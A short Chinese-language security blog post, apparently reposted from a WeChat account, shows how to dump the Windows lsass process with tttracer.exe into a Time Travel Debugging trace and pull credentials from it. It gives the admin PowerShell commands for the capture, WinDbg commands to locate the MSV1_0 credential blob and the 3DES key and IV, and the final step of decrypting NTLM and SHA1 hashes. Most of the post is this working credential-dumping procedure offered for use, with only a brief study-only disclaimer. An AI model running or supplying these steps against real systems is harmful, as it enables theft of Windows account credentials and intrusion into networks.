Lsass dump is dead, long live Lsass Time Travel!

admin 2022年8月18日08:00:40安全文章评论26 views704字阅读2分20秒阅读模式

分享一个小tips,利用tttracer.exe进行lsass转储,转储成Time Travel Debugging格式,思路来源:https://twitter.com/n_o_t_h_a_n_k_s/status/1559620227586875392


首先新建两个管理员权限的powershell终端,分别运行:

tttracer -dumpfull -attach (Get-Process lsass | Select -expand id)
tttracer -stop (Get-Process lsass | Select -expand id)

然后将得到的.run文件放入WinDbg Preview.

懒得本地再装WinDbg Preview.了直接用作者的图


Lsass dump is dead, long live Lsass Time Travel!


然后运行下面的指令得到MSV1_0 blob区域

db poi(poi(poi(poi(lsasrv!LogonSessionList))+0x108)+0x10)+0x28+0x8 L0x1b0

Lsass dump is dead, long live Lsass Time Travel!



然后运行下面的指令拿到3des的key和iv


db lsasrv!InitializationVector L8
db poi(poi(lsasrv!h3DesKey)+0x10)+0x38+4 L0x18

Lsass dump is dead, long live Lsass Time Travel!


最后就是用key和iv去解密blob拿到ntlm、sha1


Lsass dump is dead, long live Lsass Time Travel!


注意该方法dump的文件mimikatz无法解密,不同版本偏移不同所以windbg命令也不相同







     ▼
更多精彩推荐,请关注我们


请严格遵守网络安全法相关条例!此分享主要用于学习,切勿走上违法犯罪的不归路,一切后果自付!


Lsass dump is dead, long live Lsass Time Travel!



原文始发于微信公众号(鸿鹄实验室):Lsass dump is dead, long live Lsass Time Travel!

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年8月18日08:00:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  Lsass dump is dead, long live Lsass Time Travel! http://cn-sec.com/archives/1241139.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: